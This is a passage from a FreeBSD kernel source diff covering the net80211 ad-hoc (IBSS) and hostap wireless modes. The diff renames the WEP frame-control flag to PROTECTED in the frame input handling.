BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 IBSS mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void adhoc_vattach(struct ieee80211vap *); static int adhoc_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int adhoc_input(struct ieee80211_node *, struct mbuf *, int, int); static void adhoc_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); static void ahdemo_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); static void adhoc_recv_ctl(struct ieee80211_node *, struct mbuf *, int subtype); void ieee80211_adhoc_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_IBSS] = adhoc_vattach; ic->ic_vattach[IEEE80211_M_AHDEMO] = adhoc_vattach; } void ieee80211_adhoc_detach(struct ieee80211com *ic) { } static void adhoc_vdetach(struct ieee80211vap *vap) { } static void adhoc_vattach(struct ieee80211vap *vap) { vap->iv_newstate = adhoc_newstate; vap->iv_input = adhoc_input; if (vap->iv_opmode == IEEE80211_M_IBSS) vap->iv_recv_mgmt = adhoc_recv_mgmt; else vap->iv_recv_mgmt = ahdemo_recv_mgmt; vap->iv_recv_ctl = adhoc_recv_ctl; vap->iv_opdetach = adhoc_vdetach; #ifdef IEEE80211_SUPPORT_TDMA /* * Throw control to tdma support. Note we do this * after setting up our callbacks so it can piggyback * on top of us. */ if (vap->iv_caps & IEEE80211_C_TDMA) ieee80211_tdma_vattach(vap); #endif } static void sta_leave(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni != vap->iv_bss) ieee80211_node_leave(ni); } /* * IEEE80211_M_IBSS+IEEE80211_M_AHDEMO vap state machine handler. */ static int adhoc_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(vap->iv_ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: break; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_RUN: /* beacon miss */ /* purge station table; entries are stale */ ieee80211_iterate_nodes(&ic->ic_sta, sta_leave, vap); /* fall thru... */ case IEEE80211_S_INIT: if (vap->iv_des_chan != IEEE80211_CHAN_ANYC && !IEEE80211_IS_CHAN_RADAR(vap->iv_des_chan)) { /* * Already have a channel; bypass the * scan and startup immediately. */ ieee80211_create_ibss(vap, ieee80211_ht_adjust_channel(ic, vap->iv_des_chan, vap->iv_flags_ht)); break; } /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: /* * This can happen because of a change in state * that requires a reset. Trigger a new scan * unless we're in manual roaming mode in which * case an application must issue an explicit request. */ if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; default: goto invalid; } break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_SCAN: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { ieee80211_note(vap, "synchronized with %s ssid ", ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(vap->iv_bss->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif break; default: goto invalid; } /* * When 802.1x is not in use mark the port authorized * at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); /* * Fake association when joining an existing bss. */ if (!IEEE80211_ADDR_EQ(ni->ni_macaddr, vap->iv_myaddr) && ic->ic_newassoc != NULL) ic->ic_newassoc(ni, ostate != IEEE80211_S_RUN); break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 0); break; default: invalid: IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: unexpected state transition %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); break; } return 0; } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 1; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int adhoc_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (dir != IEEE80211_FC1_DIR_NODS) bssid = wh->i_addr1; else if (type == IEEE80211_FC0_TYPE_CTL) bssid = wh->i_addr1; else { if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (2): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } bssid = wh->i_addr3; } /* * Validate the bssid. */ if (!IEEE80211_ADDR_EQ(bssid, vap->iv_bss->ni_bssid) && !IEEE80211_ADDR_EQ(bssid, ifp->if_broadcastaddr)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } /* * Data frame, cons up a node when it doesn't * exist. This should probably done after an ACL check. */ if (type == IEEE80211_FC0_TYPE_DATA && ni == vap->iv_bss && !IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Beware of frames that come in too early; we * can receive broadcast frames and creating sta * entries will blow up because there is no bss * channel yet. */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "not in RUN state (%s)", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_badstate++; goto err; } /* * Fake up a node for this newly * discovered member of the IBSS. */ ni = ieee80211_fakeup_adhoc_node(vap, wh->i_addr2); if (ni == NULL) { /* NB: stat kept for alloc failure */ goto err; } } IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; if (HAS_SEQ(type)) { uint8_t tid = ieee80211_gettid(wh); if (IEEE80211_QOS_HAS_SEQ(wh) && TID_TO_WME_AC(tid) >= WME_AC_VI) ic->ic_wme.wme_hipri_traffic++; rxseq = le16toh(*(uint16_t *)wh->i_seq); if (! ieee80211_check_rxseq(ni, wh)) { /* duplicate, discard */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, "duplicate", "seqno <%u,%u> fragno <%u,%u> tid %u", rxseq >> IEEE80211_SEQ_SEQ_SHIFT, ni->ni_rxseqs[tid] >> IEEE80211_SEQ_SEQ_SHIFT, rxseq & IEEE80211_SEQ_FRAG_MASK, ni->ni_rxseqs[tid] & IEEE80211_SEQ_FRAG_MASK, tid); vap->iv_stats.is_rx_dup++; IEEE80211_NODE_STAT(ni, rx_dup); goto out; } ni->ni_rxseqs[tid] = rxseq; } } switch (type) { case IEEE80211_FC0_TYPE_DATA: hdrspace = ieee80211_hdrspace(ic, wh); if (m->m_len < hdrspace && (m = m_pullup(m, hdrspace)) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto out; } /* XXX no power-save support */ /* * Handle A-MPDU re-ordering. If the frame is to be * processed directly then ieee80211_ampdu_reorder * will return 0; otherwise it has consumed the mbuf * and we should do nothing more with it. */ if ((m->m_flags & M_AMPDU) && ieee80211_ampdu_reorder(ni, m) != 0) { m = NULL; goto out; } resubmit_ampdu: /* * Handle privacy requirements. Note that we * must not be preempted from here until after * we (potentially) call ieee80211_crypto_demic; * otherwise we may violate assumptions in the * crypto cipher modules used to do delayed update * of replay sequence numbers. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if ((vap->iv_flags & IEEE80211_F_PRIVACY) == 0) { /* * Discard encrypted frames when privacy is off. */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "WEP", "%s", "PRIVACY off"); vap->iv_stats.is_rx_noprivacy++; IEEE80211_NODE_STAT(ni, rx_noprivacy); goto out; } key = ieee80211_crypto_decap(ni, m, hdrspace); if (key == NULL) { /* NB: stats+msgs handled in crypto_decap */ IEEE80211_NODE_STAT(ni, rx_wepfail); goto out; } wh = mtod(m, struct ieee80211_frame *); - wh->i_fc[1] &= ~IEEE80211_FC1_WEP; + wh->i_fc[1] &= ~IEEE80211_FC1_PROTECTED; } else { /* XXX M_WEP and IEEE80211_F_PRIVACY */ key = NULL; } /* * Save QoS bits for use below--before we strip the header. */ if (subtype == IEEE80211_FC0_SUBTYPE_QOS) { qos = (dir == IEEE80211_FC1_DIR_DSTODS) ? ((struct ieee80211_qosframe_addr4 *)wh)->i_qos[0] : ((struct ieee80211_qosframe *)wh)->i_qos[0]; } else qos = 0; /* * Next up, any fragmentation. */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { m = ieee80211_defrag(ni, m, hdrspace); if (m == NULL) { /* Fragment dropped or frame not complete yet */ goto out; } } wh = NULL; /* no longer valid, catch any uses */ /* * Next strip any MSDU crypto bits. */ if (key != NULL && !ieee80211_crypto_demic(vap, key, m, 0)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "demic error"); vap->iv_stats.is_rx_demicfail++; IEEE80211_NODE_STAT(ni, rx_demicfail); goto out; } /* copy to listener after decrypt */ if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = ieee80211_decap(vap, m, hdrspace); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } eh = mtod(m, struct ether_header *); if (!ieee80211_node_is_authorized(ni)) { /* * Deny any non-PAE frames received prior to * authorization. For open/shared-key * authentication the port is mark authorized * after authentication completes. For 802.1x * the port is not marked authorized by the * authenticator until the handshake has completed. */ if (eh->ether_type != htons(ETHERTYPE_PAE)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, eh->ether_shost, "data", "unauthorized port: ether type 0x%x len %u", eh->ether_type, m->m_pkthdr.len); vap->iv_stats.is_rx_unauth++; IEEE80211_NODE_STAT(ni, rx_unauth); goto err; } } else { /* * When denying unencrypted frames, discard * any non-PAE frames received without encryption. */ if ((vap->iv_flags & IEEE80211_F_DROPUNENC) && (key == NULL && (m->m_flags & M_WEP) == 0) && eh->ether_type != htons(ETHERTYPE_PAE)) { /* * Drop unencrypted frames. */ vap->iv_stats.is_rx_unencrypted++; IEEE80211_NODE_STAT(ni, rx_unencrypted); goto out; } } /* XXX require HT? */ if (qos & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } else { #ifdef IEEE80211_SUPPORT_SUPERG m = ieee80211_decap_fastframe(vap, ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; #endif } if (dir == IEEE80211_FC1_DIR_DSTODS && ni->ni_wdsvap != NULL) ieee80211_deliver_data(ni->ni_wdsvap, ni, m); else ieee80211_deliver_data(vap, ni, m); return IEEE80211_FC0_TYPE_DATA; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "data", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && doprint(vap, subtype)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); vap->iv_recv_ctl(ni, m, subtype); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; } static int is11bclient(const uint8_t *rates, const uint8_t *xrates) { static const uint32_t brates = (1<<2*1)|(1<<2*2)|(1<<11)|(1<<2*11); int i; /* NB: the 11b clients we care about will not have xrates */ if (xrates != NULL || rates == NULL) return 0; for (i = 0; i < rates[1]; i++) { int r = rates[2+i] & IEEE80211_RATE_VAL; if (r > 2*11 || ((1<ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; uint8_t *frm, *efrm, *sfrm; uint8_t *ssid, *rates, *xrates; #if 0 int ht_state_change = 0; #endif wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response * frames to discover neighbors. */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } if (scan.capinfo & IEEE80211_CAPINFO_IBSS) { if (!IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Create a new entry in the neighbor table. */ ni = ieee80211_add_neighbor(vap, wh, &scan); } else if (ni->ni_capinfo == 0) { /* * Update faked node created on transmit. * Note this also updates the tsf. */ ieee80211_init_neighbor(ni, wh, &scan); } else { /* * Record tsf for potential resync. */ memcpy(ni->ni_tstamp.data, scan.tstamp, sizeof(ni->ni_tstamp)); } /* * This isn't enabled yet - otherwise it would * update the HT parameters and channel width * from any node, which could lead to lots of * strange behaviour if the 11n nodes aren't * exactly configured to match. */ #if 0 if (scan.htcap != NULL && scan.htinfo != NULL && (vap->iv_flags_ht & IEEE80211_FHT_HT)) { if (ieee80211_ht_updateparams(ni, scan.htcap, scan.htinfo)) ht_state_change = 1; } #endif if (ni != NULL) { IEEE80211_RSSI_LPF(ni->ni_avgrssi, rssi); ni->ni_noise = nf; } /* * Same here - the channel width change should * be applied to the specific peer node, not * to the ic. Ie, the interface configuration * should stay in its current channel width; * but it should change the rate control and * any queued frames for the given node only. * * Since there's no (current) way to inform * the driver that a channel width change has * occured for a single node, just stub this * out. */ #if 0 if (ht_state_change) ieee80211_update_chw(ic); #endif } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; return; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* frame must be directed */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not unicast"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates */ ssid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_SSID(vap->iv_bss, ssid, return); if ((vap->iv_flags & IEEE80211_F_HIDESSID) && ssid[1] == 0) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "no ssid with ssid suppression enabled"); vap->iv_stats.is_rx_ssidmismatch++; /*XXX*/ return; } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. */ ieee80211_send_proberesp(vap, wh->i_addr2, is11bclient(rates, xrates) ? IEEE80211_SEND_LEGACY_11B : 0); break; case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } #undef IEEE80211_VERIFY_LENGTH #undef IEEE80211_VERIFY_ELEMENT static void ahdemo_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; /* * Process management frames when scanning; useful for doing * a site-survey. */ if (ic->ic_flags & IEEE80211_F_SCAN) adhoc_recv_mgmt(ni, m0, subtype, rssi, nf); else { wh = mtod(m0, struct ieee80211_frame *); switch (subtype) { case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_PROBE_REQ: case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } } static void adhoc_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } diff --git a/sys/net80211/ieee80211_hostap.c b/sys/net80211/ieee80211_hostap.c index 91c58abf35f2..8cb97b04f6a1 100644 --- a/sys/net80211/ieee80211_hostap.c +++ b/sys/net80211/ieee80211_hostap.c @@ -1,2340 +1,2340 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 HOSTAP mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void hostap_vattach(struct ieee80211vap *); static int hostap_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int hostap_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf); static void hostap_deliver_data(struct ieee80211vap *, struct ieee80211_node *, struct mbuf *); static void hostap_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int rssi, int nf); static void hostap_recv_ctl(struct ieee80211_node *, struct mbuf *, int); void ieee80211_hostap_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_HOSTAP] = hostap_vattach; } void ieee80211_hostap_detach(struct ieee80211com *ic) { } static void hostap_vdetach(struct ieee80211vap *vap) { } static void hostap_vattach(struct ieee80211vap *vap) { vap->iv_newstate = hostap_newstate; vap->iv_input = hostap_input; vap->iv_recv_mgmt = hostap_recv_mgmt; vap->iv_recv_ctl = hostap_recv_ctl; vap->iv_opdetach = hostap_vdetach; vap->iv_deliver_data = hostap_deliver_data; 